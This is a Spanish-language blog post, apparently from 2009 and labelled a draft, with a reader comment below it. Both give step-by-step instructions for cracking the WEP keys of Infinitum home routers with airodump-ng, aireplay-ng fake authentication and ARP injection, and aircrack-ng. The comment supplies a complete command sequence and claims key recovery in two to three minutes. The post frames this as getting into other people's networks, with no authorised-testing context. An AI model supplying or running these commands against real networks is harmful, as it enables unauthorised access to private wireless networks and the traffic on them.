Obtener passwords de infinitum (borrador)
Mucha gente es la que me pregunta sobre como crackear el password de un ruteador, de hecho casi a cualquier ruteador es posible crackear el password, pero va mas en via del tipo de seguridad que tenga, hay que dejar claro que todos o almenos todos los ruteadores de inifnitum que conozco usan WEP y con un nivel de seguridad de 64 bits algo que es bastante bajo, sin embargo si es WAP o WAP 2.0 entonces tambien es posible, pero es en realidad bastante dificil.
Mi hardware, una dell 640m con tarjeta de red intel 3945 (si, si se puede inyectar)
Basicamente para que esto funcione hay dos opciones, a nuestro linux parchear el controlador de la tarjeta de red dejandola probablemente inestable o lo que yo prefiero, usar un live CD en mi caso prefiero wifiway, aunque tambien existen otros, al bootear el CD rom debemos iniciar las X con startx (en la version 1.0 me parece que no es necesario)
Abrimos una consola, y poner airodump-ng wifi0, nos mostrara una lista de conexiones wireles, aqui lo importante es encontrar una que tengamos buena señal lo que se ve reflejado en el numero de “beacons” que se transfieren despues de esto anotaremos su MAC address y su canal.
En mi caso existe un script que simplifica algunas cosas, ipw3945.sh el cual nos pide un rate (lo mejor es poner 2) el canal y el MAC del access point, ahora ya tenemos la tarjeta de red apuntando hacia donde queremos, asi que empezamos a capturar paquetes, en una consola ponemos a trabajar a airodump-ng -w loquesea rtap0 ya con esto estaremos capturando, pero seguramente muy lento (nos podemos fijar en el numero de datas que vamos capturando) lo que necesitamos es inyectar datas para poder aumentar esta transferencia, por lo que lo primero es autentificarnos en el ruteador, esto lo hacemos con:
aireplay-ng -1 0 wifi0 (te pedira que agreges unas flags, -e, -b y -h)
En caso de que logremos autentificarnos en otra consola pondremos
aireplay-ng -3 wifi0 (tambien pedira otras flags -b y -h creo, pendiente de edicion)
Debemos comenzar a ver que recibe arps y de un momento a otro empezara a enviar tambien, entonces nos fijaremos en nuestra ventana del airodump como los datas aumentan rapidamente, generalmente cuando lleguemos a unos 100,000 ivs sera suficiente para comenzar el crackeo, aunque en algunos casos con menos de 25,000 es posible.
Primero podremos probar con aircrack-ptw-es nombredelarchivo.cap y si tenemos suerte nos dara el password en caso contrario probaremos con aircrack-ng nombredelarchivo.cap y quizas -n 64 para especificar que se trata de un password de 64 bits, es raro que alguien cambie el password por default del ruteador y wala =)
Este es un borrador, necesito documentar el proceso para afinar algunos detalles 
(
Popularity: 20% [?]
Wikipedia: CD Enlaces relacionados:
Loading ...
Mayo 31st, 2009 at 10:05 pm
despues de un mini tutorial contigo por el MSN y algo de rtfm o uso los siguientes comandos:
// para crear una interfaz virtual en modo monitor
airmon-ng start wlan0
// para ver las redes disponibles y en q canal funcionan
airodump-ng mon0
// una vez encontrada una buena ejecuto: (digamos q esta en el canal 4 y quiero q guarde los paquetes en el archivo i4545.cap
airodump-ng mon0 -c 4 -w i4545
// luego en otra terminal corro para disque asociarme con ese ap:
aireplay-ng –fakeauth 0 mon0 -e infinitum4545
// y luego para inyectar paquetes: (aqui el valor de 1024 lo vario de 250 a 1024 dependiendo de q tanta velocidad me de)
aireplay-ng -x 1024 -3 mon0 -e infinitum4545
// cuando el airodump me dice q esa red tiene 20,000 en data en otra consola corro:
aircrack-ng -z i4545.cap
y esta ultima me da la clave
uso slackware con aircrack 1 rc3, drivers de madwifi y mi wireless es una atheros, todo el procedimiento me toma unos 2 o 3 minutos.
Wikipedia: MSN